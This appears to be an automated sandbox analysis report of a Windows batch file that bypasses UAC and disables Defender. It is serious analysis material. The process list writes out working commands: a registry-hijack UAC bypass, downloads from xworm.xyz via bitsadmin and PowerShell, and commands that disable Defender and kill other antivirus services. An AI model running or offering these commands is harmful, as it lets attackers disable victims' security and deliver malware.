Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A

Stops running service(s)

evasion execution

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 5112 wrote to memory of 2448 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 5112 wrote to memory of 2448 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 2448 wrote to memory of 3052 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2448 wrote to memory of 3052 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 5112 wrote to memory of 4812 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 4812 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe
PID 5112 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe
PID 5112 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 4896 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 4896 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 4416 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 4416 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 2452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 2452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 4564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 4564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 1316 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1316 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3196 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3196 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 384 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 384 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5020 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5020 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3060 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableTamperProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"

C:\Windows\system32\sc.exe

sc stop mfevtp

C:\Windows\system32\sc.exe

sc config mfevtp start= disabled

C:\Windows\system32\sc.exe

sc stop mfefire

C:\Windows\system32\sc.exe

sc config mfefire start= disabled

C:\Windows\system32\sc.exe

sc stop mfehidk

C:\Windows\system32\sc.exe

sc config mfehidk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeapfk

C:\Windows\system32\sc.exe

sc config mfeapfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeavfk

C:\Windows\system32\sc.exe

sc config mfeavfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfefirek

C:\Windows\system32\sc.exe

sc config mfefirek start= disabled

C:\Windows\system32\sc.exe

sc stop avastsvc

C:\Windows\system32\sc.exe

sc config avastsvc start= disabled

C:\Windows\system32\sc.exe

sc stop avastui

C:\Windows\system32\sc.exe

sc config avastui start= disabled

C:\Windows\system32\sc.exe

sc stop nissrv

C:\Windows\system32\sc.exe

sc config nissrv start= disabled

C:\Windows\system32\sc.exe

sc stop Symantec AntiVirus

C:\Windows\system32\sc.exe

sc config "Symantec AntiVirus" start= disabled

C:\Windows\system32\sc.exe

sc stop ccSvcHst

C:\Windows\system32\sc.exe

sc config ccSvcHst start= disabled

C:\Windows\system32\sc.exe

sc stop NortonSecurity

C:\Windows\system32\sc.exe

sc config NortonSecurity start= disabled

C:\Windows\system32\sc.exe

sc stop Norton AntiVirus

C:\Windows\system32\sc.exe

sc config "Norton AntiVirus" start= disabled

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcuihost.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McInstru.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ccSvcHst.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfefirek.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfehidk.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastsvc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ModuleCoreService.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ZhuDongFangYu.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Safe.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Tray.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ns.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 193.114.54.198.in-addr.arpa udp
US 198.54.114.193:443 xworm.xyz tcp

Files

memory/2760-0-0x00007FFF88FD3000-0x00007FFF88FD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deai02lx.qec.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2760-9-0x000001C47AB30000-0x000001C47AB52000-memory.dmp

memory/2760-10-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

memory/2760-11-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

memory/2760-12-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

memory/2760-16-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

MD5 03bf8860dbd0724e466baf1e1bca86b3
SHA1 bde4d3ef9ac846e1e83bea37f88097cd370d5197
SHA256 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af
SHA512 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1cebd15e19078003226326aa50667159
SHA1 6d346e2ff9b8b6834a3e4b58240c41f5178e57f9
SHA256 ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe
SHA512 81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4